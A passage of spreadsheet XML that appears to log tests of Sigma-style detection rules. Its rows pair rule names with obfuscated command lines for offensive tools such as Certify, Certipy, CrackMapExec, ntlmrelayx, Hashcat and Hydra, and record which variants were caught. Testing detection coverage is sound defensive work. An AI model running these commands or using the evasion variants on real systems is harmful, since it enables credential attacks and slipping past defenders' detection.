      <c r="H1882" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1882" s="44" t="n"/>
      <c r="J1882" s="44" t="n"/>
      <c r="K1882" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1883" ht="15.75" customHeight="1" s="42">
      <c r="A1883" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B1883" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_adcspwn</t>
        </is>
      </c>
      <c r="C1883" s="44" t="inlineStr">
        <is>
          <t>HackTool - ADCSPwn Execution</t>
        </is>
      </c>
      <c r="D1883" s="44" t="inlineStr">
        <is>
          <t>cd8c163e-a19b-402e-bdd5-419ff5859f12</t>
        </is>
      </c>
      <c r="E1883" s="44" t="inlineStr">
        <is>
          <t>ADCSPwn.exe --port 443 --adcs ca.domain.local</t>
        </is>
      </c>
      <c r="F1883" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1883" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1883" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1883" s="44" t="n"/>
      <c r="J1883" s="44" t="n"/>
      <c r="K1883" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1884" ht="15.75" customHeight="1" s="42">
      <c r="A1884" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B1884" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C1884" s="44" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D1884" s="44" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E1884" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\jp.exe "-t" * "-p" 1337</t>
        </is>
      </c>
      <c r="F1884" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1884" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1884" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1884" s="44" t="n"/>
      <c r="J1884" s="44" t="n"/>
      <c r="K1884" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1885" ht="15.75" customHeight="1" s="42">
      <c r="A1885" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B1885" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C1885" s="44" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D1885" s="44" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E1885" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Tools\jp.exe -t * -p^  1337</t>
        </is>
      </c>
      <c r="F1885" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1885" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1885" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1885" s="44" t="n"/>
      <c r="J1885" s="44" t="n"/>
      <c r="K1885" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1886" ht="15.75" customHeight="1" s="42">
      <c r="A1886" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B1886" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C1886" s="44" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D1886" s="44" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E1886" s="44" t="inlineStr">
        <is>
          <t>python.exe ntlmrelayx.py -t smb://192.0.2.1</t>
        </is>
      </c>
      <c r="F1886" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1886" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1886" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1886" s="44" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution (5589ab4f-a767-433c-961d-c91f3f704db1); Potential SMB Relay Attack Tool Execution (5589ab4f-a767-433c-961d-c91f3f704db1); Potential SMB Relay Attack Tool Execution (5589ab4f-a767-433c-961d-c91f3f704db1)</t>
        </is>
      </c>
      <c r="J1886" s="44" t="n"/>
      <c r="K1886" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1887" ht="15.75" customHeight="1" s="42">
      <c r="A1887" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B1887" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C1887" s="44" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D1887" s="44" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E1887" s="44" t="inlineStr">
        <is>
          <t>nslookup.exe "UWhRCAAAAABAAAAA"</t>
        </is>
      </c>
      <c r="F1887" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1887" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1887" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1887" s="44" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing (0ed99dda-6a35-11ef-8c99-0242ac120002); Attempts of Kerberos Coercion Via DNS SPN Spoofing (0ed99dda-6a35-11ef-8c99-0242ac120002)</t>
        </is>
      </c>
      <c r="J1887" s="44" t="n"/>
      <c r="K1887" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1888" ht="15.75" customHeight="1" s="42">
      <c r="A1888" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B1888" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C1888" s="44" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D1888" s="44" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E1888" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c nslookup.exe UWhRC^AAAAABAAAAA</t>
        </is>
      </c>
      <c r="F1888" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1888" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1888" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1888" s="44" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing (0ed99dda-6a35-11ef-8c99-0242ac120002)</t>
        </is>
      </c>
      <c r="J1888" s="44" t="n"/>
      <c r="K1888" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1889" ht="15.75" customHeight="1" s="42">
      <c r="A1889" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B1889" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C1889" s="44" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D1889" s="44" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E1889" s="44" t="inlineStr">
        <is>
          <t>nslookup.exe "UWhRCAAAAA""BAAAAA"</t>
        </is>
      </c>
      <c r="F1889" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1889" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1889" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1889" s="44" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing (0ed99dda-6a35-11ef-8c99-0242ac120002); Attempts of Kerberos Coercion Via DNS SPN Spoofing (0ed99dda-6a35-11ef-8c99-0242ac120002)</t>
        </is>
      </c>
      <c r="J1889" s="44" t="n"/>
      <c r="K1889" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1890" ht="15.75" customHeight="1" s="42">
      <c r="A1890" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1890" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C1890" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D1890" s="44" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E1890" s="44" t="inlineStr">
        <is>
          <t>Certify find /vulnerable</t>
        </is>
      </c>
      <c r="F1890" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1890" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1890" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1890" s="44" t="n"/>
      <c r="J1890" s="44" t="n"/>
      <c r="K1890" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1891" ht="15.75" customHeight="1" s="42">
      <c r="A1891" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1891" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C1891" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D1891" s="44" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E1891" s="44" t="inlineStr">
        <is>
          <t>Certify.exe find -vulnerable</t>
        </is>
      </c>
      <c r="F1891" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1891" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1891" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1891" s="44" t="n"/>
      <c r="J1891" s="44" t="n"/>
      <c r="K1891" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1892" ht="15.75" customHeight="1" s="42">
      <c r="A1892" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1892" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C1892" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D1892" s="44" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E1892" s="44" t="inlineStr">
        <is>
          <t>Certify.exe "find" /vulnerable</t>
        </is>
      </c>
      <c r="F1892" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1892" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1892" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1892" s="44" t="n"/>
      <c r="J1892" s="44" t="n"/>
      <c r="K1892" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1893" ht="15.75" customHeight="1" s="42">
      <c r="A1893" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1893" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C1893" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D1893" s="44" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E1893" s="44" t="inlineStr">
        <is>
          <t>Certify.exe	find	/vulnerable</t>
        </is>
      </c>
      <c r="F1893" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1893" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1893" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1893" s="44" t="n"/>
      <c r="J1893" s="44" t="n"/>
      <c r="K1893" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1894" ht="15.75" customHeight="1" s="42">
      <c r="A1894" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1894" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C1894" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D1894" s="44" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E1894" s="44" t="inlineStr">
        <is>
          <t>Certify.exe find  /vulnerable</t>
        </is>
      </c>
      <c r="F1894" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1894" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1894" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1894" s="44" t="n"/>
      <c r="J1894" s="44" t="n"/>
      <c r="K1894" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1895" ht="15.75" customHeight="1" s="42">
      <c r="A1895" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1895" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certipy</t>
        </is>
      </c>
      <c r="C1895" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certipy Execution</t>
        </is>
      </c>
      <c r="D1895" s="44" t="inlineStr">
        <is>
          <t>6938366d-8954-4ddc-baff-c830b3ba8fcd</t>
        </is>
      </c>
      <c r="E1895" s="44" t="inlineStr">
        <is>
          <t>Certipy.exe	find	-vulnerable</t>
        </is>
      </c>
      <c r="F1895" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1895" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1895" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1895" s="44" t="n"/>
      <c r="J1895" s="44" t="n"/>
      <c r="K1895" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1896" ht="15.75" customHeight="1" s="42">
      <c r="A1896" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1896" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certipy</t>
        </is>
      </c>
      <c r="C1896" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certipy Execution</t>
        </is>
      </c>
      <c r="D1896" s="44" t="inlineStr">
        <is>
          <t>6938366d-8954-4ddc-baff-c830b3ba8fcd</t>
        </is>
      </c>
      <c r="E1896" s="44" t="inlineStr">
        <is>
          <t>Certipy.exe "find" -vulnerable</t>
        </is>
      </c>
      <c r="F1896" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1896" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1896" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1896" s="44" t="n"/>
      <c r="J1896" s="44" t="n"/>
      <c r="K1896" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1897" ht="15.75" customHeight="1" s="42">
      <c r="A1897" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1897" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certipy</t>
        </is>
      </c>
      <c r="C1897" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certipy Execution</t>
        </is>
      </c>
      <c r="D1897" s="44" t="inlineStr">
        <is>
          <t>6938366d-8954-4ddc-baff-c830b3ba8fcd</t>
        </is>
      </c>
      <c r="E1897" s="44" t="inlineStr">
        <is>
          <t>Certipy.exe find "-vulnerable"</t>
        </is>
      </c>
      <c r="F1897" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1897" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1897" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1897" s="44" t="n"/>
      <c r="J1897" s="44" t="n"/>
      <c r="K1897" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1898" ht="15.75" customHeight="1" s="42">
      <c r="A1898" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1898" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certipy</t>
        </is>
      </c>
      <c r="C1898" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certipy Execution</t>
        </is>
      </c>
      <c r="D1898" s="44" t="inlineStr">
        <is>
          <t>6938366d-8954-4ddc-baff-c830b3ba8fcd</t>
        </is>
      </c>
      <c r="E1898" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c Certipy.exe find^  -vulnerable</t>
        </is>
      </c>
      <c r="F1898" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1898" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1898" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1898" s="44" t="n"/>
      <c r="J1898" s="44" t="n"/>
      <c r="K1898" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1899" ht="15.75" customHeight="1" s="42">
      <c r="A1899" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1899" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certipy</t>
        </is>
      </c>
      <c r="C1899" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certipy Execution</t>
        </is>
      </c>
      <c r="D1899" s="44" t="inlineStr">
        <is>
          <t>6938366d-8954-4ddc-baff-c830b3ba8fcd</t>
        </is>
      </c>
      <c r="E1899" s="44" t="inlineStr">
        <is>
          <t>Certipy.exe find  -vulnerable</t>
        </is>
      </c>
      <c r="F1899" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1899" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1899" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1899" s="44" t="n"/>
      <c r="J1899" s="44" t="n"/>
      <c r="K1899" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1900" ht="15.75" customHeight="1" s="42">
      <c r="A1900" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1900" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1900" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1900" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1900" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\crackmapexec.exe	smb	192.0.2.10</t>
        </is>
      </c>
      <c r="F1900" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1900" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1900" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1900" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J1900" s="44" t="n"/>
      <c r="K1900" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1901" ht="15.75" customHeight="1" s="42">
      <c r="A1901" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1901" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1901" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1901" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1901" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\crackmapexec.exe "smb" 192.0.2.10</t>
        </is>
      </c>
      <c r="F1901" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1901" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1901" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1901" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J1901" s="44" t="n"/>
      <c r="K1901" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1902" ht="15.75" customHeight="1" s="42">
      <c r="A1902" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1902" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1902" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1902" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1902" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\crackmapexec.exe smb  192.0.2.10</t>
        </is>
      </c>
      <c r="F1902" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1902" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1902" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1902" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J1902" s="44" t="n"/>
      <c r="K1902" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1903" ht="15.75" customHeight="1" s="42">
      <c r="A1903" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1903" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1903" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1903" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1903" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Tools\crackmapexec.exe sm^b 192.0.2.10</t>
        </is>
      </c>
      <c r="F1903" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1903" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1903" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1903" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J1903" s="44" t="n"/>
      <c r="K1903" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1904" ht="15.75" customHeight="1" s="42">
      <c r="A1904" s="44" t="inlineStr">
        <is>
          <t>t1110.002</t>
        </is>
      </c>
      <c r="B1904" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_hashcat</t>
        </is>
      </c>
      <c r="C1904" s="44" t="inlineStr">
        <is>
          <t>HackTool - Hashcat Password Cracker Execution</t>
        </is>
      </c>
      <c r="D1904" s="44" t="inlineStr">
        <is>
          <t>39b31e81-5f5f-4898-9c0e-2160cfc0f9bf</t>
        </is>
      </c>
      <c r="E1904" s="44" t="inlineStr">
        <is>
          <t>C:\AtomicRedTeam\ExternalPayloads\hashcat-6.1.1\hashcat.exe --attack-mode 0 --hash-type 1000 --rules-file .\rules\Incisive-leetspeak.rule C:\AtomicRedTeam\atomics\T1110.002\src\sam.txt C:\AtomicRedTeam\atomics\T1110.002\src\password.lst</t>
        </is>
      </c>
      <c r="F1904" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1904" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1904" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1904" s="44" t="n"/>
      <c r="J1904" s="44" t="n"/>
      <c r="K1904" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1905" ht="15.75" customHeight="1" s="42">
      <c r="A1905" s="44" t="inlineStr">
        <is>
          <t>t1110.002</t>
        </is>
      </c>
      <c r="B1905" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_hashcat</t>
        </is>
      </c>
      <c r="C1905" s="44" t="inlineStr">
        <is>
          <t>HackTool - Hashcat Password Cracker Execution</t>
        </is>
      </c>
      <c r="D1905" s="44" t="inlineStr">
        <is>
          <t>39b31e81-5f5f-4898-9c0e-2160cfc0f9bf</t>
        </is>
      </c>
      <c r="E1905" s="44" t="inlineStr">
        <is>
          <t>C:\AtomicRedTeam\ExternalPayloads\hashcat-6.1.1\hashcat.exe "-a" 0 "-m" 1000 "-r" .\rules\Incisive-leetspeak.rule C:\AtomicRedTeam\atomics\T1110.002\src\sam.txt C:\AtomicRedTeam\atomics\T1110.002\src\password.lst</t>
        </is>
      </c>
      <c r="F1905" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1905" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1905" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1905" s="44" t="n"/>
      <c r="J1905" s="44" t="n"/>
      <c r="K1905" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1906" ht="15.75" customHeight="1" s="42">
      <c r="A1906" s="44" t="inlineStr">
        <is>
          <t>t1110.002</t>
        </is>
      </c>
      <c r="B1906" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_hashcat</t>
        </is>
      </c>
      <c r="C1906" s="44" t="inlineStr">
        <is>
          <t>HackTool - Hashcat Password Cracker Execution</t>
        </is>
      </c>
      <c r="D1906" s="44" t="inlineStr">
        <is>
          <t>39b31e81-5f5f-4898-9c0e-2160cfc0f9bf</t>
        </is>
      </c>
      <c r="E1906" s="44" t="inlineStr">
        <is>
          <t>C:\AtomicRedTeam\ExternalPayloads\hashcat-6.1.1\hashcat.exe -m 1000  -a 0  -r  .\rules\Incisive-leetspeak.rule C:\AtomicRedTeam\atomics\T1110.002\src\sam.txt C:\AtomicRedTeam\atomics\T1110.002\src\password.lst</t>
        </is>
      </c>
      <c r="F1906" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1906" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1906" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1906" s="44" t="n"/>
      <c r="J1906" s="44" t="n"/>
      <c r="K1906" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1907" ht="15.75" customHeight="1" s="42">
      <c r="A1907" s="44" t="inlineStr">
        <is>
          <t>t1110</t>
        </is>
      </c>
      <c r="B1907" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_hydra</t>
        </is>
      </c>
      <c r="C1907" s="44" t="inlineStr">
        <is>
          <t>HackTool - Hydra Password Bruteforce Execution</t>
        </is>
      </c>
      <c r="D1907" s="44" t="inlineStr">
        <is>
          <t>aaafa146-074c-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1907" s="44" t="inlineStr">
        <is>
          <t>hydra.exe "-u" "-p" -C .	flags.txt ^USER^ ^PASS^ 192.0.2.1</t>
        </is>
      </c>
      <c r="F1907" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1907" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1907" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1907" s="44" t="n"/>
      <c r="J1907" s="44" t="n"/>
      <c r="K1907" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1908" ht="15.75" customHeight="1" s="42">
      <c r="A1908" s="44" t="inlineStr">
        <is>
          <t>t1110</t>
        </is>
      </c>
      <c r="B1908" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_hydra</t>
        </is>
      </c>
      <c r="C1908" s="44" t="inlineStr">
        <is>
          <t>HackTool - Hydra Password Bruteforce Execution</t>
        </is>
      </c>
      <c r="D1908" s="44" t="inlineStr">
        <is>
          <t>aaafa146-074c-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1908" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c hydra.exe -u^  -p^  -C .\flags.txt ^USER^ ^PASS^ 192.0.2.1</t>
        </is>
      </c>
      <c r="F1908" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1908" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1908" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1908" s="44" t="n"/>
      <c r="J1908" s="44" t="n"/>
      <c r="K1908" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1909" ht="15.75" customHeight="1" s="42">
      <c r="A1909" s="44" t="inlineStr">
        <is>
          <t>t1110</t>
        </is>
      </c>
      <c r="B1909" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_hydra</t>
        </is>
      </c>
      <c r="C1909" s="44" t="inlineStr">
        <is>
          <t>HackTool - Hydra Password Bruteforce Execution</t>
        </is>
      </c>
      <c r="D1909" s="44" t="inlineStr">
        <is>
          <t>aaafa146-074c-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1909" s="44" t="inlineStr">
        <is>
          <t>hydra.exe -u -p -C .\flags.txt "^USER^" "^PASS^" 192.0.2.1</t>
        </is>
      </c>
      <c r="F1909" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1909" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1909" s="44" t="b">
        <v>0</v>
      </c>
